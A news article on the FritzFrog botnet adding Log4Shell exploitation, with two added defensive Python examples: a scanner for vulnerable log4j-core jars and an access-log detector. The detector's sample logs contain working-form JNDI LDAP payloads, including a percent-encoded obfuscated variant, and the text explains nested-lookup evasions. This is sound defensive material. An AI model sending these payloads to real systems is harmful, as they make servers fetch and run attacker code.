FritzFrog Botnet Exploits Log4Shell
Botnet Looks for Vulnerable Internal Network Machines

Delivering more proof that the Log4Shell vulnerability is endemic, Akamai researchers detected botnet malware updated to use the flaw as an infection vector, supplementing its usual remote login brute force technique.
Akamai Security Intelligence Group observed the shift in the FritzFrog botnet, first documented in 2020.
Log4Shell, tracked as CVE-2021-44228, burst into public awareness in late 2021 when security researchers identified a flaw in the ubiquitous Apache Log4j 2 Java library. A panel of U.S. public and private sector security experts in mid-2022 warned that patching every vulnerable Log4j instance would likely take a decade "or longer" (see: Log4j Flaw Is 'Endemic,' Says Cyber Safety Review Board).
To spread their malware, FritzFrog operators exploit the fact that system administrators give lower priority to patching internal network machines. Internet-facing applications are an obvious priority for patching. But unpatched internal machines can still be a risk, the researchers said. FritzFrog looks for subnets and targets possible addresses within them.
"This means that even if the 'high-profile' internet-facing applications have been patched, a breach of any asset in the network by FritzFrog can expose unpatched internal assets to exploitation," they said.
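The practical defensive response to the point above is to know where unpatched Log4j copies sit on internal hosts, not only on internet-facing ones. The following inventory scanner is an added example written for this article; it is not Akamai's or FritzFrog's code. It walks a directory tree, opens every `.jar`/`.war`/`.ear`, recurses into archives bundled inside them (fat application jars), and reports any archive that still ships `JndiLookup.class` together with the version it declares in `pom.properties` or the manifest. Versions below 2.15.0, the first log4j-core release that addressed CVE-2021-44228, are flagged as vulnerable. The `make_sample_jar` helper and the `demo` function build constructed stand-in archives in a temporary directory so the script runs offline; the archives are not real Log4j artifacts.

```python
import io
import os
import tempfile
import zipfile
from pathlib import Path

# Class that implements the JNDI lookup abused by Log4Shell (CVE-2021-44228)
JNDI_CLASS = "org/apache/logging/log4j/core/lookup/JndiLookup.class"
POM_PROPS = "META-INF/maven/org.apache.logging.log4j/log4j-core/pom.properties"
FIXED_VERSION = (2, 15, 0)  # first log4j-core release addressing CVE-2021-44228
ARCHIVE_SUFFIXES = (".jar", ".war", ".ear")


def parse_version(text):
    """Turn '2.14.1' or '2.17.1-SNAPSHOT' into a comparable tuple of ints."""
    parts = []
    for piece in text.strip().split("."):
        digits = "".join(ch for ch in piece if ch.isdigit())
        if not digits:
            break
        parts.append(int(digits))
    return tuple(parts)


def declared_version(zf):
    """Read the log4j-core version from pom.properties, else the manifest."""
    try:
        for line in zf.read(POM_PROPS).decode("utf-8", "replace").splitlines():
            if line.startswith("version="):
                return line.split("=", 1)[1].strip()
    except KeyError:
        pass
    try:
        manifest = zf.read("META-INF/MANIFEST.MF").decode("utf-8", "replace")
    except KeyError:
        return None
    for line in manifest.splitlines():
        if line.startswith("Implementation-Version:"):
            return line.split(":", 1)[1].strip()
    return None


def inspect_archive(zf, label):
    """Report JndiLookup in this archive and in any archive nested inside it."""
    findings = []
    names = set(zf.namelist())
    if JNDI_CLASS in names:
        version = declared_version(zf)
        # Unknown version is treated as vulnerable: verify by hand, do not assume safe
        vulnerable = version is None or parse_version(version) < FIXED_VERSION
        findings.append({"jar": label, "version": version, "vulnerable": vulnerable})
    for name in sorted(names):
        if name.lower().endswith(ARCHIVE_SUFFIXES):
            with zf.open(name) as nested:
                data = io.BytesIO(nested.read())
            try:
                with zipfile.ZipFile(data) as inner:
                    findings.extend(inspect_archive(inner, f"{label}!{name}"))
            except zipfile.BadZipFile:
                continue  # not a real zip despite the suffix
    return findings


def scan_tree(root):
    """Walk a filesystem tree and inspect every Java archive found."""
    findings = []
    for path in Path(root).rglob("*"):
        if path.is_file() and path.suffix.lower() in ARCHIVE_SUFFIXES:
            try:
                with zipfile.ZipFile(path) as zf:
                    findings.extend(inspect_archive(zf, str(path)))
            except zipfile.BadZipFile:
                continue
    return findings


def make_sample_jar(path, version, include_jndi=True):
    """Constructed stand-in for a log4j-core jar (not a real Apache artifact)."""
    with zipfile.ZipFile(path, "w") as zf:
        zf.writestr("META-INF/MANIFEST.MF",
                    f"Manifest-Version: 1.0\nImplementation-Version: {version}\n")
        if include_jndi:
            zf.writestr(JNDI_CLASS, b"\xca\xfe\xba\xbe")  # class-file magic only


def demo():
    """Build a constructed tree with two loose jars and one fat jar, then scan it."""
    with tempfile.TemporaryDirectory() as root:
        old = os.path.join(root, "log4j-core-2.14.1.jar")
        make_sample_jar(old, "2.14.1")
        make_sample_jar(os.path.join(root, "log4j-core-2.17.1.jar"), "2.17.1")
        with zipfile.ZipFile(os.path.join(root, "app.jar"), "w") as zf:
            zf.write(old, "BOOT-INF/lib/log4j-core-2.14.1.jar")  # bundled copy
        return sorted(scan_tree(root), key=lambda f: f["jar"])


if __name__ == "__main__":
    for finding in demo():
        print(finding)
```

Run it against a real host with `scan_tree("/")` (or the application directories of interest); the bundled-archive recursion matters because the copy of log4j-core that an internal service actually loads is frequently inside a fat jar rather than a loose file that package management would report.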
To trigger the Log4Shell vulnerability, FritzFrog forces an application to log data containing a malicious payload. The payload forces the Java application to connect to a server controlled by the attacker and download a malware binary.
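Because the trigger is simply attacker-controlled text reaching a log statement, the logs themselves are where a defender can see the attempt. The detector below is an added example, not code from the article or from Akamai; it scans web-server access log lines for the Log4j JNDI lookup syntax. It first URL-decodes each line (request logs often store the payload percent-encoded) and then collapses nested `${lower:...}`/`${upper:...}` and `${...:-default}` lookups, which Log4j itself would resolve before the JNDI lookup runs, so that a detector matching only the literal `${jndi:` string is not bypassed. The log lines are constructed samples using documentation IP ranges.

```python
import re
import urllib.parse

# A lookup whose value is a default: ${anything:-X} resolves to X
DEFAULT_RE = re.compile(r"\$\{[^${}]*:-([^${}]*)\}")
# Case-changing lookups: ${lower:X} / ${upper:X} resolve to X (case is irrelevant to us)
CASE_RE = re.compile(r"\$\{(?:lower|upper):([^${}]*)\}", re.IGNORECASE)
# What remains after normalisation if a JNDI lookup was embedded
JNDI_RE = re.compile(r"\$\{\s*jndi\s*:", re.IGNORECASE)


def normalize(text: str, max_rounds: int = 10) -> str:
    """Undo percent-encoding and nested lookups so the JNDI lookup becomes visible."""
    for _ in range(max_rounds):  # decode repeatedly: payloads may be double-encoded
        decoded = urllib.parse.unquote(text)
        if decoded == text:
            break
        text = decoded
    for _ in range(max_rounds):  # collapse innermost lookups until nothing changes
        collapsed = CASE_RE.sub(r"\1", DEFAULT_RE.sub(r"\1", text))
        if collapsed == text:
            break
        text = collapsed
    return text


def is_suspicious(line: str) -> bool:
    """True if the line contains a (possibly nested or encoded) JNDI lookup."""
    return JNDI_RE.search(normalize(line)) is not None


def scan(lines):
    """Return (line_number, line) for every suspicious line."""
    return [(n, line) for n, line in enumerate(lines, 1) if is_suspicious(line)]


# Constructed sample access-log lines (documentation addresses, not real traffic)
SAMPLE_LOGS = [
    '203.0.113.5 - - [10/Dec/2021:10:00:01 +0000] "GET /index.html HTTP/1.1" '
    '200 512 "-" "Mozilla/5.0"',
    '203.0.113.5 - - [10/Dec/2021:10:00:02 +0000] "GET / HTTP/1.1" '
    '200 512 "-" "${jndi:ldap://192.0.2.10:1389/a}"',
    '203.0.113.5 - - [10/Dec/2021:10:00:03 +0000] '
    '"GET /?q=%24%7B%24%7Blower%3Aj%7Dndi%3Aldap%3A%2F%2F192.0.2.10%2Fa%7D HTTP/1.1" '
    '404 0 "-" "curl/7.79"',
]

if __name__ == "__main__":
    for number, line in scan(SAMPLE_LOGS):
        print(f"line {number}: {line}")
```

The match is deliberately on the lookup syntax rather than on the `ldap://` scheme, since Log4j's JNDI lookup also accepts other providers; pair this with egress monitoring for unexpected outbound connections from Java services, which is the second half of the behaviour the article describes.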
Researchers in 2022 called FritzFrog a "new generation" of botnet for its use of a proprietary peer-to-peer protocol to spread across SSH servers worldwide.
It still uses brute force techniques to infect SSH servers, Akamai said, but will now "also attempt to identify specific SSH targets by enumerating several system logs on each of its victims."